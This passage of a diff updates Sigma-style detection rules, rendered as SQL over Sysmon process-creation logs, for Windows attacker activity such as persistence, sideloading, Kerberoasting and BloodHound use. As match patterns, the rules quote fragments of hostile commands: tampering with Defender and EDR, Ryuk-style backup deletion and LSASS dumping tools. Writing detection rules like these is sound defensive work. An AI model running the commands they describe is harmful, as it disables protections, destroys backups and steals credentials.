"proc_creation_win_lolbin_installutil_download.yml" }, { - "title": "DLL Sideloading by VMware Xfer Utility", - "id": 
"ebea773c-a8f1-42ad-a856-00cb221966e8", + "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", + "id": "b66474aa-bd92-4333-a16c-298155b120df", "status": "experimental", - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", + "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + "filename": "proc_creation_win_schtasks_powershell_persistence.yml" }, { - "title": "Netsh Allow Group Policy on Microsoft Defender Firewall", - "id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", - "status": 
"test", - "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", - "author": "frack113", + "title": "Sideloading Link.EXE", + "id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "status": "experimental", + "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1218" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%group=%' ESCAPE '\\' AND CommandLine LIKE '%new%' ESCAPE '\\' AND CommandLine LIKE '%enable=Yes%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\link.exe' ESCAPE '\\' AND CommandLine LIKE '%LINK /%' ESCAPE '\\') AND NOT (((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml" + "filename": "proc_creation_win_lolbin_sideload_link_binary.yml" }, { - "title": "Greedy File Deletion Using Del", - "id": "204b17ae-4007-471b-917b-b917b315c5db", + "title": "Disable Important Scheduled Task", + "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", "status": "experimental", - "description": 
"Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", - "author": "frack113", + "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\\\*.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\*.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_del_greedy_deletion.yml" + "filename": "proc_creation_win_schtasks_disable.yml" }, { - "title": "HackTool - Dumpert Process Dumper Execution", - "id": 
"2704ab9e-afe2-4854-a3b1-0c0706d03578", + "title": "Explorer NOUACCHECK Flag", + "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "falsepositives": [ - "Very unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_hktl_dumpert.yml" - }, - { - "title": "Suspicious MSHTA Child Process", - "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", - "status": "test", - "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", - "author": "Michael Haag", "tags": [ "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" - ], - "falsepositives": [ - "Printer software / driver installations", - "HP software" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" - ], - "filename": "proc_creation_win_mshta_susp_child_processes.yml" - }, - { - "title": "Possible Shim Database Persistence via sdbinst.exe", - "id": "517490a7-115a-48c6-8862-1a481504d5a8", - "status": "test", - "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", - "author": "Markus Neis", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" + "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml" + "filename": "proc_creation_win_explorer_nouaccheck.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip", - "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "title": "Potential SPN Enumeration Via Setspn.EXE", + "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", "status": "test", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects service principal name 
(SPN) enumeration used for Kerberoasting", + "author": "Markus Neis, keepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Unknown" + "Administration activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\setspn.exe' ESCAPE '\\' OR OriginalFileName = 'setspn.exe' OR (Description LIKE '%Query or reset the computer%' ESCAPE '\\' AND Description LIKE '%SPN attribute%' ESCAPE '\\')) AND CommandLine LIKE '%-q%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_setspn_spn_enumeration.yml" }, { - "title": "Process Memory Dump Via Dotnet-Dump", - "id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", + "title": "Potential Discovery Activity Via Dnscmd.EXE", + "id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", "status": "experimental", - "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. 
DNS zones used to host the DNS records for a particular domain.", + "author": "@gott_cyber", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.execution", + "attack.t1543.003" ], "falsepositives": [ - "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated" + "Legitimate administration use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dotnet-dump.exe' ESCAPE '\\' OR OriginalFileName = 'dotnet-dump.dll') AND CommandLine LIKE '%collect%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%/enumrecords%' ESCAPE '\\' OR CommandLine LIKE '%/enumzones%' ESCAPE '\\' OR CommandLine LIKE '%/ZonePrint%' ESCAPE '\\' OR CommandLine LIKE '%/info%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dotnet_dump.yml" + "filename": "proc_creation_win_dnscmd_discovery.yml" }, { - "title": "Potential Tampering With Security Products Via WMIC", - "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", - "status": "test", - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Defense Evasion Via Right-to-Left Override", + "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "status": "experimental", + "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", + "author": "Micah Babinski, @micahbabinski", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1036.002" 
], "falsepositives": [ - "Legitimate administration" + "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR 
CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%‮%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_uninstall_security_products.yml" + "filename": "proc_creation_win_susp_right_to_left_override.yml" }, { - "title": "Disable Windows Defender AV Security Monitoring", - "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "title": "Suspicious Csi.exe Usage", + "id": "40b95d31-1afc-469e-8d34-9a3a667d058e", "status": "experimental", - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "author": "ok @securonix invrep-de, oscd.community, frack113", + "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. 
Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ + "attack.execution", + "attack.t1072", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." + "Legitimate usage by software developers" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\csi.exe' ESCAPE '\\' OR Image LIKE '%\\\\rcsi.exe' ESCAPE '\\') OR OriginalFileName IN ('csi.exe', 'rcsi.exe')) AND Company = 'Microsoft Corporation')" ], - "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" + "filename": "proc_creation_win_csi_execution.yml" }, { - "title": "Remote Access Tool - ScreenConnect Execution", - "id": "57bff678-25d1-4d6c-8211-8ca106d12053", - "status": "test", - "description": "An adversary may 
use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Potential Ryuk Ransomware Activity", + "id": "c37510b8-2107-4b78-aa32-72f251e7a844", + "status": "stable", + "description": "Detects Ryuk ransomware activity", + "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate usage of the tool" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'ScreenConnect Service' OR Product = 'ScreenConnect' OR Company = 'ScreenConnect Software'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR 
CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect.yml" + "filename": "proc_creation_win_malware_ryuk.yml" }, { - "title": "Uninstall Crowdstrike Falcon Sensor", - "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", - "author": "frack113", + "title": "Set Suspicious Files as System Files Using Attrib.EXE", + "id": "efec536f-72e8-4656-8960-5e85d091345b", + "status": "experimental", + "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564.001" ], "falsepositives": [ - "Administrator might leverage the same command line for debugging or other purposes. 
However this action must be always investigated" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" + "filename": "proc_creation_win_attrib_system_susp_paths.yml" }, { - "title": "HTML Help Shell Spawn", - "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", + "title": "HackTool - Bloodhound/Sharphound Execution", + "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", "status": "test", - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "author": "Maxim Pavlunin", + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - 
"attack.t1218.001", - "attack.t1218.010", - "attack.t1218.011", + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other programs that use these command line option and accepts an 'All' parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE 'C:\\\\Windows\\\\hh.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR Image LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\Windows\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description 
LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (Image LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" + "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" }, { - "title": "Monitoring For Persistence Via BITS", - "id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", + "title": "Suspicious File Characteristics Due to Missing Fields", + "id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", "status": "test", - "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. 
